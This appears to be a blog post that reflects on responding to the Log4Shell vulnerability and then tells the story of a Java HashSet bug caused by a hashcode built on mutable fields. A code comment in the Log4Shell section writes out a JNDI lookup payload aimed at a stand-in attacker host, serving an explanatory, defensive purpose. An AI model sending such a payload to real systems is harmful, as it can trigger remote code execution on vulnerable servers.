Surviving the “Big One” in IT – Part I

For every kind of natural disaster, there is a “Big One”. Everybody who lived through it remembers the time; everybody else has at least heard stories about it. Every time a similar natural disaster occurs, it gets compared to this one.

We just commemorated the “Boxing Day Tsunami” of twenty years ago. Another example might be “The Big One”, the devastating San Francisco earthquake of 1906. From today’s viewpoint, it wasn’t the strongest earthquake on record, but it was one of the first to be extensively covered by “modern” media. It also predates the Richter scale, so we can’t directly compare it to more recent events.

In the rather young history of IT, we have had our fair share of “natural” disasters as well. We used to give the really bad ones nicknames. The first vulnerability that came with its own logo and domain was Heartbleed in 2014, ten years ago.

Let’s name-drop some big incidents:

The first entry in this list is different from the others in that it was a “near miss”. It would have been a veritable catastrophe, with millions of potentially breached and compromised systems. It was discovered and averted right before it would have been distributed worldwide.

Another thing we can deduce from the list is the number of incidents per year:

https://www.cve.org/about/Metrics

From around 5,000 published vulnerabilities per year until 2014 (roughly one every two hours), the count rose to 20,000 in 2021 and 30,000 in 2024. That’s more than 80 reports per day, or more than 3 per hour. A single human cannot keep up with these numbers. We need to rely on filters that block out the noise and highlight the relevant issues for us.

But let’s assume that the next “Big One” happens and demands our attention. There is one characteristic shared by all incidents I have witnessed that makes them similar to earthquakes or floods: they happen everywhere at once. Let me describe the situation using Log4Shell as an example:

The first reports indicated a major vulnerability in the log4j package. That seemed bad, but it was a logging module. What could possibly happen? We might lose some log files?

It soon became clear that the vulnerability could be exploited remotely by simply sending a malicious request that gets logged, like a web request without proper authentication to a route that doesn’t exist. That’s exactly what logging is for: capturing the outliers and preserving them for review.
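To make this tangible, here is a minimal sketch of the pattern, assuming a typical Java request handler (the class name, route handling and attacker hostname are invented for illustration). It shows why ordinary logging of untrusted input was enough to trigger Log4Shell in log4j 2.x before version 2.15.0:

    // Hypothetical request handler, only to illustrate the attack surface of
    // Log4Shell (CVE-2021-44228) in log4j 2.x before version 2.15.0.
    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    public class UnknownRouteHandler {
        private static final Logger LOG = LogManager.getLogger(UnknownRouteHandler.class);

        public void handleUnknownRoute(String requestedPath) {
            // Perfectly normal-looking logging of an unexpected request.
            // If requestedPath contains something like "${jndi:ldap://attacker.example/a}",
            // a vulnerable log4j resolves the lookup while formatting the message
            // and may load and execute remote code - no authentication required.
            LOG.warn("No route found for requested path: {}", requestedPath);
        }
    }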

Right at the moment it dawned on us that every system with any remote accessibility was at risk, the first reports of automated attacks emerged. It was now Friday, late evening; the weekend had just started and you realized that you were in a race against bots. The one thing you cannot do is call it a week and relax for two days. In those 48 hours, the war would be lost and the systems compromised. You know that you have at most 4 hours to:

  • Gather a list of affected projects/systems
  • Assess the realistic risk based on current knowledge
  • Hand over concrete advice to the system’s admins
  • Or employ the countermeasures yourself

In our case, that meant reviewing nearly 50 projects, documenting the decisions and communicating with the operators.

While we did that, during Friday night, new information emerged that not only log4j 2.x, but also 1.x was susceptible to similar attacks.

We had to review our list and decisions based on the new situation. While we were doing that, somebody on the internet refuted the claim and proclaimed the 1.x versions safe.

We had to split our investigation into two scenarios that both got documented:

  • scenario 1: Only log4j 2.x is affected
  • scenario 2: All versions of log4j are vulnerable

We took action based on scenario 1 and held our breath, hoping that scenario 2 wouldn’t come true.

One system with log4j 1.x was deemed “low impact” if unavailable, so we took it off the net as a precaution. Spoiler: scenario 2 turned out to be false, so this was an unnecessary step in hindsight. But in the moment, it was one problem off the list, regardless of which scenario was valid.

The thing to recognize here is that the engagement with the subject is neither linear nor fixed. The scope and details of the problem change while you work on it. Uncertainties arise and need to be taken into account. When you look back on your work, you’ll notice all the unnecessary actions you took. They didn’t appear unnecessary in the moment, or at least you weren’t sure.

After we had completed our system review and carried out all the necessary actions, we switched to “survey and communicate” mode. We monitored the internet chatter about the vulnerability and stayed in contact with the admins who were online. I remember an e-mail from an admin who copied some excerpts from the server log files with the caption: “The attacks are here!”.

And that was the moment my heart sank, because we had totally forgotten about the second front: Our own systems!

Every e-mail is processed by our mailing infrastructure, and one piece of it is the mail archive. This system is written in Java. I raced to find out which specific libraries it uses, because if a log4j 2.x library were included, the friendly admin would have just inadvertently performed a real attack on our infrastructure.

A few minutes after I finished my review (and found a log4j 1.x library), the vendor of the product sent an e-mail validating my result by stating that the product was not at risk. But those 30 minutes of uncertainty were pure panic!

In an airplane emergency, they always tell you to make sure you are stable first (i.e. put on your own oxygen mask before helping others). The same can be said about IT vulnerabilities: mind your own systems first! If the mail archive had been vulnerable, we would have secured our clients’ systems and then fallen prey to friendly fire.

Let’s reiterate the situation we will find ourselves in when the next “Big One” hits:

  • We need to compile a list of affected instances, both under our direct control (our own systems) and under our care (the systems we manage for others). One possible way to automate parts of this inventory is sketched after this list.
  • We need to assess the impact of immediate shutdown. If feasible, we should take as many systems as possible out of the equation by stopping or airgapping them.
  • We need to evaluate the risk of each instance in relation to the vulnerability. These evaluations need to be prioritized and timeboxed, because they need to be performed as fast as possible.
  • We need to document our findings (for later revision) and communicate the decision or recommendation to the operators.
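As referenced in the first item above, parts of the inventory step can be scripted. Here is a minimal sketch, assuming the affected library can be recognized by a marker class inside deployed JAR files (as was the case with log4j’s JndiLookup class); the marker name and paths are only examples, and real deployments would also need to look inside fat JARs and WAR files:

    // Hypothetical inventory helper: walks a directory tree and reports every JAR
    // that contains a marker class of the affected library (here: log4j's JndiLookup).
    import java.io.IOException;
    import java.nio.file.Files;
    import java.nio.file.Path;
    import java.util.stream.Stream;
    import java.util.zip.ZipEntry;
    import java.util.zip.ZipFile;

    public class AffectedJarScanner {
        private static final String MARKER =
                "org/apache/logging/log4j/core/lookup/JndiLookup.class";

        public static void main(String[] args) throws IOException {
            Path root = Path.of(args.length > 0 ? args[0] : ".");
            try (Stream<Path> files = Files.walk(root)) {
                files.filter(path -> path.toString().endsWith(".jar"))
                     .forEach(AffectedJarScanner::checkJar);
            }
        }

        private static void checkJar(Path jar) {
            try (ZipFile zip = new ZipFile(jar.toFile())) {
                ZipEntry entry = zip.getEntry(MARKER);
                if (entry != null) {
                    System.out.println("AFFECTED: " + jar);
                }
            } catch (IOException e) {
                System.out.println("UNREADABLE: " + jar + " (" + e.getMessage() + ")");
            }
        }
    }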

This situation is remarkably similar to real-world disaster mitigation:

  • The lists of instances are disaster plans
  • The shutdowns are like evacuations
  • The risk evaluation is essentially a triage task
  • The documentation and delegation phase resembles the command and control work of disaster relief crews

This helps a lot to see which elements can be prepared beforehand!

The disaster plans are the most obvious element that can be constructed during quiet times. Because no disaster occurs according to plan and plans tend to get outdated quickly, they need to be intentionally fuzzy on some details.

The evacuation itself cannot be fully prepared, but it can be facilitated by plans and automation.

The triage cannot be prepared either, but supported by checklists and training.

The documentation and communication can be somewhat formalized, but will probably happen in a chaotic and unpredictable manner.

With this insight, we can look at possible ideas for preparation and planning in the next part of this blog series.

Small cause – big effect (Story 1)

This is a story about a small programming error that caused a company-wide chaos.

Modern software development is very different from the low-level programming you had to endure in the early days of computing. Computer science invented concepts like “high-level programming languages” that abstract away many of the menial tasks necessary to achieve the desired functionality. Examples of these abstractions are register allocation, memory management and control structures. But even if we enter programming at a “high level”, we build whole cities of skyscrapers (metaphorically speaking) on top of those foundation layers. And still, if we make errors in the lowest building blocks of our buildings, they will come crashing down like a tower in a game of Jenga.

This story illustrates one such error in a small and low building block that had widespread and expensive effects. And while the problem might seem perfectly avoidable in isolation, in reality there are no silver bullets that will solve those problems completely and forever.

The story is altered in some aspects to protect the innocent, but the core message wasn’t changed. I also want to point out that our company isn’t connected to this story in any way other than being able to retell it.

The setting

Back in the days of unreliable and slow dial-up internet connections, there was a big company-wide software system that was supposed to connect all clients, desktop computers and notebooks alike, with a central server that published important news and documentation updates. The company developing and using the system had numerous field workers who connected from a hotel room somewhere near the next customer, let the updates run and disconnected again. They relied on extensive internal documentation that had to be up to date when working offline at the customer’s site.

Because the documentation was too big to be transferred completely after each change, but not partitioned enough to use a standard tool like rsync, the company developed a custom solution written in Java. A central server kept track of every client and all updates that needed to be delivered. This was done using a Set, more specifically a HashSet for each client. Imagine a HashMap (or Dictionary) with only a key, but no payload value. The Set’s entries were the update command objects themselves. With this construct, whenever a client connected, the server could just iterate over the corresponding Set and execute every object in it. After an execution had succeeded, the object was removed from the Set.
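A hypothetical reconstruction of that construct might look like this; all class and method names are invented for illustration and are not taken from the actual system:

    // Hypothetical reconstruction of the server-side bookkeeping; all names are invented.
    import java.util.ArrayList;
    import java.util.HashMap;
    import java.util.HashSet;
    import java.util.Map;
    import java.util.Set;

    public class UpdateServer {

        public interface UpdateCommand {
            boolean execute(); // returns true if the client confirmed the update
        }

        // One HashSet of pending update command objects per client.
        private final Map<String, Set<UpdateCommand>> pendingUpdates = new HashMap<>();

        public void enqueue(String clientId, UpdateCommand command) {
            pendingUpdates.computeIfAbsent(clientId, id -> new HashSet<>()).add(command);
        }

        // Called when a client connects: execute every pending command and
        // remove it from the Set once it succeeded.
        public void deliverUpdates(String clientId) {
            Set<UpdateCommand> pending = pendingUpdates.getOrDefault(clientId, new HashSet<>());
            for (UpdateCommand command : new ArrayList<>(pending)) { // iterate over a snapshot
                if (command.execute()) {
                    pending.remove(command); // relies on a stable hashcode, see below
                }
            }
        }
    }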

Going live

The system went live and worked instantly. All clients were served their updates, and the computing power requirements for the central server were low because only a few decisions needed to be made. The internet connection was the bottleneck, as expected. But it soon turned out to be too much of a bottleneck. More and more clients didn’t get all their updates. Some were provided with the most recent updates, but lacked older ones. Others only got the older ones.

The administrators asked for a bigger line and got it installed. The problems thinned out for a while, but soon returned as strong as ever. Apparently it wasn’t a problem of raw bandwidth. The developers had a look at their data structure and noted that a HashSet doesn’t guarantee the order of traversal, so old and new updates could easily get mixed up. But that shouldn’t have been a problem, because once the updates were delivered, they would be removed from the Set. And all updates had to be delivered anyway, regardless of age.

Going down

Then the central server instance stopped working with an OutOfMemoryError. The heap space of the Java virtual machine was used up by update command objects, sitting in their HashSets, waiting to be executed and removed. There were far too many update command objects for any reasonable explanation. The part of the system that generated the update commands was reviewed and double-checked. No errors related to the problem at hand were found.

The next step was a review of the algorithm for iterating, executing and removing the update commands. And there, right in the update command class, the cause was found: the update command objects calculated their hashcode value based on their data fields, including the command’s execution date. Every time an update command was executed, this date field was updated to the most recent value. This caused the hashcode value of the object to change, which meant the update command object couldn’t be removed from the Set, because the HashSet implementation relies on the hashcode value to find its objects. You could ask the Set if the object was still contained and it would answer “no”, yet the object would still show up in every loop over the content.
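This effect can be demonstrated in a few lines of standalone Java (the class and field names are invented): as soon as a field that feeds into hashCode() changes, the object becomes invisible to contains() and remove(), while iteration still returns it.

    // Standalone demonstration; the class and field names are invented.
    import java.util.HashSet;
    import java.util.Objects;
    import java.util.Set;

    public class MutableHashcodeDemo {

        static class UpdateCommand {
            private final String payload;
            private long executionDate; // mutable field...

            UpdateCommand(String payload) {
                this.payload = payload;
            }

            void markExecuted() {
                this.executionDate = System.currentTimeMillis(); // ...changed after insertion
            }

            @Override
            public boolean equals(Object other) {
                if (!(other instanceof UpdateCommand)) {
                    return false;
                }
                UpdateCommand that = (UpdateCommand) other;
                return executionDate == that.executionDate && payload.equals(that.payload);
            }

            @Override
            public int hashCode() {
                return Objects.hash(payload, executionDate); // includes the mutable field
            }
        }

        public static void main(String[] args) {
            Set<UpdateCommand> pending = new HashSet<>();
            UpdateCommand command = new UpdateCommand("update documentation chapter 7");
            pending.add(command);

            command.markExecuted(); // the hashcode changes while the object sits in the Set

            System.out.println(pending.contains(command)); // false - looked up in the wrong bucket
            System.out.println(pending.remove(command));   // false - cannot be removed anymore
            System.out.println(pending.size());            // 1 - but it is still in there
            for (UpdateCommand entry : pending) {
                System.out.println("still iterating over: " + entry.payload);
            }
        }
    }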

The cause

The Sets with update commands for the clients always grew in size, because once an update command object had been executed, it couldn’t be removed, yet it appeared absent. Whenever a client connected, it got served all update commands since the beginning, over and over again, in semi-random order. This explained why sometimes the most recent updates were delivered while older ones were still missing. It also explained why the bandwidth was never enough and why all clients lacked updates sooner or later.

The cost of this excessive update orgy was substantial: numerous clients had leeched all the (useless) data they could get until the connection was cut, day after day, over expensive long-distance calls. Yet they still lacked crucial updates, which caused additional harm and chaos. And all this damage could be traced back to a simple programming rule that was violated:

Never include mutable data in the calculation of a hash code.
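One possible fix, under the assumption that every update command can carry an immutable identifier (the names are again invented): base equals() and hashCode() only on that identifier, so the mutable execution date no longer influences the hash.

    // One possible fix; the class and field names are invented for illustration.
    import java.util.UUID;

    public final class FixedUpdateCommand {
        private final UUID id = UUID.randomUUID(); // immutable identity, assigned once
        private final String payload;
        private long executionDate; // still mutable, but no longer part of the hash

        public FixedUpdateCommand(String payload) {
            this.payload = payload;
        }

        public void markExecuted() {
            this.executionDate = System.currentTimeMillis();
        }

        public String payload() {
            return payload;
        }

        public long executionDate() {
            return executionDate;
        }

        @Override
        public boolean equals(Object other) {
            return other instanceof FixedUpdateCommand
                    && id.equals(((FixedUpdateCommand) other).id);
        }

        @Override
        public int hashCode() {
            return id.hashCode(); // stable for the whole lifetime of the object
        }
    }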